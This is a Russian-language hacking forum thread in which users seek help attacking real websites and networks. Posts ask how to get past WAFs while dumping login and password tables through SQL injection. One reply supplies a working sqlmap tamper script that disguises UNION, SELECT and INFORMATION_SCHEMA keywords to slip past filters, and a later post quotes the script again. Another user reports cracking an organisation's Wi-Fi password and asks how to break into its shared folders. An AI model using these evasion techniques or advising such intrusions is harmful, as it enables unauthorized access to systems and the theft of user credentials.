ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

02.08.2019, 13:18
|
|
Guest
Сообщений: n/a
Провел на форуме: 22457
Репутация:
10
|
|
Есть интересный скуль, но когда пробую вытянуть таблицы выдается ошибка, что у юзера бд нет прав:
Код:
Code:
SELECT command denied to user 'user'@'localhost' for table 'tables'
Кто то сталкивался с таким? Eсть ли какие то варианты продвинуться дальше?
|
|
|
|

05.08.2019, 19:36
|
|
Guest
Сообщений: n/a
Провел на форуме: 97114
Репутация:
24
|
|
Чеп прикрыть USB технике что в офисе, не разбирая, не испортив?
|
|
|
|

06.08.2019, 00:06
|
|
Guest
Сообщений: n/a
Провел на форуме: 97114
Репутация:
24
|
|
Где найти нормальной информации про защиту инфы в компаний?
|
|
|
|

06.08.2019, 01:40
|
|
Guest
Сообщений: n/a
Провел на форуме: 56255
Репутация:
2
|
|
Сообщение от Octavian
Octavian said:
↑
Где найти нормальной информации про защиту инфы в компаний?
пообщаться с опытным CISO большой компании.
на линкедине полно контактов.
|
|
|
|

07.08.2019, 13:01
|
|
Guest
Сообщений: n/a
Провел на форуме: 1924
Репутация:
0
|
|
Подскажи плз тампер для обхода этого ваф WAF/IPS identified as 'ASP.NET RequestValidationMode (Microsoft)
а то при сливе выдает:
| Email | LoginPassword |
+-------+---------------+
| NULL | NULL |
| NULL | NULL |
| NULL | NULL |
| NULL | NULL |
| NULL | NULL |
| NULL | NULL |
| NULL | NULL |
| NULL | NULL |
скажи,что может мешать WAF.Буду благодарен и за другие советы по этой проблемке
P.S новичок в этом,если не затруднит,то можно развернутый ответ для "особо одаренных" =))
|
|
|
|

07.08.2019, 14:47
|
|
Guest
Сообщений: n/a
Провел на форуме: 96779
Репутация:
5
|
|
|
|
|
|

11.08.2019, 08:54
|
|
Guest
Сообщений: n/a
Провел на форуме: 4388
Репутация:
0
|
|
Прошу помощи в раскрутке скули
Что есть? Сайт написанный на Coldfusion, юнион и булеан типы, скуля в гет параметре
Кручу мапом, мап видит булеан, через ордер бай понимает что есть и юнион, видит что там 3 колонки и натыкается на ваф
Ругается на слово union, select пропускает
Мап не может определить даже тип субд из-за того что ваф не пропускает его дальше
Ошибка вафа :
You are not permitted to run URL SQL Statements on this server. Your IP address has been logged and e-mailed to our administrator.
Пробовал юрл энкод, двойной юрл энкод, почти все тамперы которые хоть как-то могли помочь
|
|
|
|

11.08.2019, 13:54
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме: 371875
Репутация:
137
|
|
Сообщение от highmoore
highmoore said:
↑
Прошу помощи в раскрутке скули
Что есть? Сайт написанный на Coldfusion, юнион и булеан типы, скуля в гет параметре
Кручу мапом, мап видит булеан, через ордер бай понимает что есть и юнион, видит что там 3 колонки и натыкается на ваф
Ругается на слово union, select пропускает
Мап не может определить даже тип субд из-за того что ваф не пропускает его дальше
Ошибка вафа :
You are not permitted to run URL SQL Statements on this server. Your IP address has been logged and e-mailed to our administrator.
Пробовал юрл энкод, двойной юрл энкод, почти все тамперы которые хоть как-то могли помочь
Пробуй обойти ваф руками, потом пиши свой тампер на этот ваф, вот как пример
.SpoilerTarget" type="button">Spoiler
#!/usr/bin/env python
"""
Copyright (c) 2006-2017 sqlmap developers ( http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.HIGHEST
def dependencies():
pass
def tamper(payload, **kwargs):
"""
........
"""
if payload:
payload = payload.replace("INFORMATION_SCHEMA.TABLES", "/*!12345%49NFORMATION_SCHEMA.TABLES*/")
payload = payload.replace("table_schema", "/*!12345%74able_schema*/")
payload = payload.replace("table_name", "/*!12345%74able_name*/")
payload = payload.replace("UNION", "/*!12345%75NION*/")
payload = payload.replace("SELECT", "/*!12345%73ELECT*/")
payload = payload.replace("SCHEMA", "%73CHEMA")
payload = payload.replace("schema", "%73chema")
payload = payload.replace("from", "/*!12345from*/")
return payload
дальше кладешь в папочку tamper/my_tamper.py и вызываешь --tamper="my_tamper"
|
|
|

12.08.2019, 03:32
|
|
Guest
Сообщений: n/a
Провел на форуме: 4388
Репутация:
0
|
|
Сообщение от winstrool
winstrool said:
↑
Пробуй обойти ваф руками, потом пиши свой тампер на этот ваф, вот как пример
Spoiler
#!/usr/bin/env python
"""
Copyright (c) 2006-2017 sqlmap developers (
http://sqlmap.org/
)
See the file 'doc/COPYING' for copying permission
"""
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.HIGHEST
def dependencies():
pass
def tamper(payload, **kwargs):
"""
........
"""
if payload:
payload = payload.replace("INFORMATION_SCHEMA.TABLES", "/*!12345%49NFORMATION_SCHEMA.TABLES*/")
payload = payload.replace("table_schema", "/*!12345%74able_schema*/")
payload = payload.replace("table_name", "/*!12345%74able_name*/")
payload = payload.replace("UNION", "/*!12345%75NION*/")
payload = payload.replace("SELECT", "/*!12345%73ELECT*/")
payload = payload.replace("SCHEMA", "%73CHEMA")
payload = payload.replace("schema", "%73chema")
payload = payload.replace("from", "/*!12345from*/")
return payload
дальше кладешь в папочку tamper/my_tamper.py и вызываешь --tamper="my_tamper"
Да, это все я понимаю, дело в том, что я руками не могу, все варианты провалились, это MSSQL как оказалось
С которым у меня не так много опыта, буду благодарен за любую помощь
|
|
|
|

12.08.2019, 18:05
|
|
Guest
Сообщений: n/a
Провел на форуме: 21715
Репутация:
0
|
|
Всем доброго вечера! Подскажите, подобрал пароль к wi-fi роутеру организации, видно локальную сеть из 5 устройств и одного принтера. Компы на винде 7. Есть ли возможность проникнуть в расшаренные папки? ибо при попытке захода на удаленный комп внутри ЛВС требуется пароль и логин. Пароль требует только к компу админа, а остальные компы видны только как медиапроигрыватели
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|